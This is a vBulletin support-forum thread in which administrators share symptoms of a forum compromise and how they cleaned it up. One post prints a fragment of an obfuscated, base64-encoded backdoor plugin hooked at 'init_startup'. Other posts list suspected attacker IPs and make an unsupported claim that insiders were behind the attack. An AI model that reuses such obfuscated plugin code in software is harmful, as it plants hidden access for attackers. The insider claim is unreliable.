Announcement

Collapse
No announcement yet.

Forum hacked...

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    I'd suggest looking over these two blog posts:
    http://www.vbulletin.com/forum/blogs...ve-been-hacked
    http://www.vbulletin.com/forum/blogs...vbulletin-site

    Comment


    • #17
      Originally posted by Jaxo View Post
      Sorry, one more thing.. any idea as to how to reset the password on paid subscriptions?
      I am not sure what you mean. There are no passwords on paid subscriptions.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API - Full / Mobile
      Vote for your favorite feature requests and the bugs you want to see fixed.

      Comment


      • #18
        That repeated IP in your post 37.130.224.22 shows this data:

        Country:
        Netherlands nl

        State/Region:
        Noord-Holland

        City:
        Amsterdam

        If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

        I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

        But, then again, it struck me as well as other admins:

        WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?

        Comment


        • #19
          Originally posted by Wayne Luke View Post

          I am not sure what you mean. There are no passwords on paid subscriptions.

          When I go to paid subscription in my admin panel no matter what tab i click it asks for a password... Looking at the logs this seems to be something they where tampering with ?

          Attached Files

          Comment


          • #20
            Has to be a plugin doing that. You would have to find the plugin and delete it.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API - Full / Mobile
            Vote for your favorite feature requests and the bugs you want to see fixed.

            Comment


            • #21
              Originally posted by Ion Saliu View Post
              That repeated IP in your post 37.130.224.22 shows this data:

              Country:
              Netherlands nl

              State/Region:
              Noord-Holland

              City:
              Amsterdam

              If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

              I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

              But, then again, it struck me as well as other admins:

              WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?

              Have had a bit of a search myself and came up with the same result.. its originating in netherlands.
              37.130.224.22 - IP Tracing and IP Tracking

              Want to trace or track an IP Address, host, or website easily? With our highly reliable IP Address Location Database, you can get detailed information on any IP Address anywhere in the world. Results include detailed IP address location, name of ISP, netspeed/speed of internet connection, and more.















              Click for big IP address location image. It is 8:44 PM UTC when you ran this IP tracer report for 37.130.224.22 here on our website, IP-Adress.com. When it comes to 37.130.224.22, you can trust that if we have all the IP trace information possible for it, then we will display it further below to assist in your research of this IP address if available. Feel free to run another IP trace for 37.130.224.22 or a different search.
              Timestamp Confirmation:
              The IP tracer report for 37.130.224.22 was ran at 8:44 PM UTC on September 9, 2013 and the information is provided below if available.


              Think i best have a look and see if it matches any members :?

              Comment


              • #22
                That didnt work very well,.. here is the link

                http://www.ip-adress.com/ip_tracer/37.130.224.22

                Comment


                • #23
                  Originally posted by Ion Saliu View Post
                  That repeated IP in your post 37.130.224.22 shows this data:

                  Country:
                  Netherlands nl

                  State/Region:
                  Noord-Holland

                  City:
                  Amsterdam

                  If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

                  I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

                  But, then again, it struck me as well as other admins:

                  WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?
                  One more IP to ban and thus be safer... the IP you posted, axiomaticule:
                  37.130.224.22
                  629334038
                  2582e016.rdns.100tb.com
                  Hosting Services
                  Hosting Services
                  Network sharing device or proxy server
                  Recently reported forum spam source. (2)

                  Country:
                  Netherlands nl

                  State/Region:
                  Noord-Holland

                  City:
                  Amsterdam

                  Comment


                  • #24
                    Originally posted by Wayne Luke View Post
                    Has to be a plugin doing that. You would have to find the plugin and delete it.
                    They may have also overwritten your subscription.php. You should not be challenged with a password, there. Check to see if the size of subscription.php is different from what comes in the installation. If so, you cannot trust your files and will need to re-upload. I've seen a TON of sites hit this way

                    Comment


                    • #25
                      Ok, so I have disabled all my plugins and the problem persists.I have also over wrote all my files (was running 4.2.0 patch 2 and uploaded 4.2.1) but still have the problem. Any other suggestions?

                      Comment


                      • #26
                        I have added this line to my config.php and now have access to the subscriptions section. so It has to be a plugin then? Its strange though that i disabling all the plugins does not sort the problem.

                        Comment


                        • #27
                          Found it !!!

                          They added this plugin..

                          title - init_startup
                          Hook location - init_startup
                          Plugin PHP codecERWQmlxUlpXaWNENTYwSlZoZytOc1pLUkZPcnhxcm44eG5OS1NYQ0RmMm9nbnM0M2VyRGJ6cmFwK3VNZzRSZWcwcj gyNEZ6b0xoNWNsSlZoYStNZ2FuWTJCZTdtQms0c2NJck1mTFZOZmJuSjdpRDF4Y21mTkl1Yk1yOWpmYkJTNk04YUpv bERzeVBCWkdRczE4bzJtTjZDeXRienAvYnltOTBYVERhN3R0dGIzYzF1dkpXeis4OTNSdjBOMzlNM3UrQ1l1OTJRdm lXeTl0cE1UbDZQa0tPTnNhcE0xcCtmUUtBcVpqV2RkK2lwWHFqd1BVOUR4QWlDV0VPSlRnUUJCQnNqNzArTXViQUxv RGxKQVlPUUhDdnlBMlRzWTltR0VsaHNxSUFRWGIrcXVqdDBRMkg4S05ldm9RWE81VGhPMmdKeXd1dFFYMmJDb2pveH VxcWxLZWJpcUx1OHZ1dGhuVmpyUEkzMURDdHlJc09wdy9ZWUpZZ1E3TlFEdFU3ZC9pQUhsdWNsWldxTHBDREhETW1y U3plbzd2dC9GUzNRWFN4V0JvdEVhV3JQK2Z3PT0nKSkpOw0KLyogYnkgaGlqQGNrZXIgKi8='));
                          exit;
                          }
                          Have just disabled it and all seems to be working !

                          Comment


                          • #28
                            Please read the following two blog posts:
                            http://www.vbulletin.com/forum/blogs...ve-been-hacked

                            http://www.vbulletin.com/forum/blogs...vbulletin-site

                            Also please see these recent security announcements:

                            vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
                            vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

                            Comment


                            • #29
                              Major hackage here as well for the last two days. I *think* I've cleaned up the last of it. Similar symptoms... weird admin accounts, crazy plugins, redirects, code being inserted into templates and phrases.

                              Is anybody else here annoyed that we paid decent money for this (relative to other forum solutions) and have had so many security headaches?

                              Comment


                              • #30
                                I have had the same problem, at 7.30 this morning.

                                I managed to catch and delete most of it, but I have a different page on paid subscriptions now.

                                The username was 30K and the IP was 178.73.207.151. and apprently came from Sweden!

                                They added the plugin stated above, and added URL's to mt templates (do a search for .biz or derpina in your templates). They used iframes.

                                I've now found a script in my header at the bottom, I've now got rid of it.

                                Best way I can advise to find all your issues is to go to
                                http://quttera.com and put in a free check, it found everything on my site, and then all I needed to do was search the templates to get rid of it. If I find anymore I will let you know here.

                                VB, I am not happy that people are able to do this, I pay to have a site that is safe from these actions.

                                Is there a way to make the system email you every time someone changes something in the Admin CP? Or changes certain things (plugins, users, forums). That way we will see this happening a lot faster and get in to stop it.
                                Last edited by rburns; Tue 10th Sep '13, 1:29am.

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X